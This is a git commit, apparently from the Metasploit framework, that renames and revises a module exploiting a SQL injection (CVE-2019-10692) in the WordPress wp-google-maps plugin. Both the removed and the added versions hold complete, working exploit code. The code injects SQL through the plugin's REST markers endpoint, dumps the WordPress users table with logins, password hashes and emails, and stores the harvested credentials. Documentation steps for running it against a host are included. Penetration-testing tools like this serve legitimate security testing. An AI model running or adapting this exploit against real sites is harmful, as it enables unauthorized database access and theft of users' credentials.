Merge pull request #2 from jrobles-r7/wp-google-maps-sqli

Wp google maps sqli update
2019-04-15 10:17:39 +02:00 · 2019-04-15 10:17:39 +02:00 · 562de86fc9
parent e9dd2f4f06 51cb4358d6
commit 562de86fc9
3 changed files with 99 additions and 105 deletions
--- a/documentation/modules/auxiliary/admin/http/wp_google_maps_sql_injection.md
+++ b/documentation/modules/auxiliary/admin/http/wp_google_maps_sql_injection.md
@ -1,14 +1,14 @@
 ## Vulnerable Application

-This module works against `wp-google-maps` between 7.11.00 and 7.11.17 (included).
+This module works against the Wordpress plugin `wp-google-maps` between 7.11.00 and 7.11.17 (included).

 [The vulnerable version is available on WordPress' plugin directory](https://downloads.wordpress.org/plugin/wp-google-maps.7.11.17.zip).

 ## Verification Steps

  1. `msfconsole`
-  2. `use auxiliary/admin/http/wp_google_maps_sql_injection`
-  3. `set RHOST <host.tld>`
+  2. `use auxiliary/admin/http/wp_google_maps_sqli`
+  3. `set RHOSTS <rhost>`
  4. Set `DB_PREFIX` if necessary
  5. `run`

--- a/modules/auxiliary/admin/http/wp_google_maps_sql_injection.rb
+++ b/modules/auxiliary/admin/http/wp_google_maps_sql_injection.rb
@ -1,102 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Auxiliary
-  include Msf::Exploit::Remote::HTTP::Wordpress
-
-  def initialize(info = {})
-    super(
-      'Name'            => 'WordPress Google Maps Plugin SQL Injection',
-      'Description'     => %q{
-        This module exploits a SQL injection vulnerability in the a REST endpoint
-        registered by the WordPress plugin wp-google-maps between 7.11.00 and
-        7.11.17 (included).
-
-        As the table prefix can be changed by administrators, set DB_PREFIX
-        accordingly.
-      },
-      'Author'          =>
-        [
-          'Thomas Chauchefoin (Synacktiv)', # Vulnerability discovery, Metasploit module
-        ],
-      'License'         => MSF_LICENSE,
-      'References'      =>
-        [
-          ['CVE', '2019-10692'],
-          ['WPVDB', '9249']
-        ],
-      'DisclosureDate'  => 'Apr 02 2019'
-    )
-
-    register_options(
-      [
-        OptString.new('DB_PREFIX', [true, 'WordPress table prefix', 'wp_'])
-      ])
-  end
-
-  def send_sql_request(sql_query)
-
-    begin
-      res = send_request_cgi(
-        'method'   => 'GET',
-        'uri'      => normalize_uri(target_uri.path, '/wp-json/wpgmza/v1/markers/'),
-        'vars_get' => {
-          'filter' => '{}',
-          'fields' => "#{sql_query}-- -",
-        }
-      )
-
-      return nil if res.nil? || res.code != 200 || res.body.nil?
-
-      res.body
-
-    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE => e
-      vprint_error("#{peer} - The host was unreachable!")
-      return nil
-    end
-  end
-
-  def check
-    if send_sql_request('0xABCDABCD+0xABCDABCD').include? '5764765594'
-      Exploit::CheckCode::Vulnerable
-    else
-      Exploit::CheckCode::Unknown
-    end
-  end
-
-  def run
-
-    credentials = ""
-
-    print_status("#{peer} - Trying to retrieve the #{datastore['DB_PREFIX']}users table...")
-
-    # Commas can't be used in the injection, so fetch all the columns
-    res = send_sql_request("* from #{datastore['DB_PREFIX']}users")
-
-    if res == '[]'
-      print_error("#{peer} - Failed to retrieve the table #{datastore['DB_PREFIX']}users")
-    else
-      body = JSON.parse(res)
-      body.each do |user|
-        print_good("#{peer} - Found #{user['user_login']} #{user['user_pass']} #{user['user_email']}")
-        connection_details = {
-          module_fullname: self.fullname,
-          username: user['user_login'],
-          private_data: user['user_pass'],
-          private_type: :nonreplayable_hash,
-          status: Metasploit::Model::Login::Status::UNTRIED,
-          proof: user['user_email']
-        }
-        create_credential(connection_details)
-        credentials << "#{user['user_login']},#{user['user_pass']},#{user['user_email']}\n"
-      end
-    end
-
-    unless credentials.empty?
-      loot = store_loot("wp_google_maps.json","application/json", rhost, res)
-      print_good("Credentials saved in: #{loot}")
-    end
-  end
-end
--- a/modules/auxiliary/admin/http/wp_google_maps_sqli.rb
+++ b/modules/auxiliary/admin/http/wp_google_maps_sqli.rb
@ -0,0 +1,96 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(
+      'Name'            => 'WordPress Google Maps Plugin SQL Injection',
+      'Description'     => %q{
+        This module exploits a SQL injection vulnerability in the a REST endpoint
+        registered by the WordPress plugin wp-google-maps between 7.11.00 and
+        7.11.17 (included).
+
+        As the table prefix can be changed by administrators, set DB_PREFIX
+        accordingly.
+      },
+      'Author'          =>
+        [
+          'Thomas Chauchefoin (Synacktiv)', # Vulnerability discovery, Metasploit module
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          ['CVE', '2019-10692'],
+          ['WPVDB', '9249']
+        ],
+      'DisclosureDate'  => '2019-04-02'
+    )
+
+    register_options(
+      [
+        OptString.new('DB_PREFIX', [true, 'WordPress table prefix', 'wp_'])
+      ])
+  end
+
+  def send_sql_request(sql_query)
+    res = send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path),
+      'vars_get' => {
+        'rest_route' => '/wpgmza/v1/markers',
+        'filter' => '{}',
+        'fields' => "#{sql_query}-- -",
+      }
+    )
+
+    return nil if res.nil? || res.code != 200 || res.body.nil?
+    res.body
+  end
+
+  def check
+    mynum = "#{Rex::Text.rand_text_numeric(8..20)}"
+    body = send_sql_request(mynum)
+    return Exploit::CheckCode::Unknown if body.nil?
+    return Exploit::CheckCode::Vulnerable if body.include?(mynum)
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def run
+    print_status("#{peer} - Trying to retrieve the #{datastore['DB_PREFIX']}users table...")
+
+    body = send_sql_request("* from #{datastore['DB_PREFIX']}users")
+    fail_with(Failure::UnexpectedReply, 'No response or unexpected status code in response') if body.nil?
+
+    begin
+      body = JSON.parse(body)
+    rescue JSON::ParserError
+      fail_with(Failure::NotFound, 'Returned data is not in JSON format')
+    end
+
+    if body.empty?
+      print_error("#{peer} - Failed to retrieve the table #{datastore['DB_PREFIX']}users")
+    else
+      loot = store_loot("wp_google_maps.json","application/json", rhost, body.to_s)
+      print_good("Credentials saved in: #{loot}")
+    end
+
+    body.each do |user|
+      print_good("#{peer} - Found #{user['user_login']} #{user['user_pass']} #{user['user_email']}")
+      connection_details = {
+        module_fullname: self.fullname,
+        username: user['user_login'],
+        private_data: user['user_pass'],
+        private_type: :nonreplayable_hash,
+        workspace_id: myworkspace_id,
+        status: Metasploit::Model::Login::Status::UNTRIED,
+        proof: user['user_email']
+      }.merge(service_details)
+      create_credential(connection_details)
+    end
+  end
+end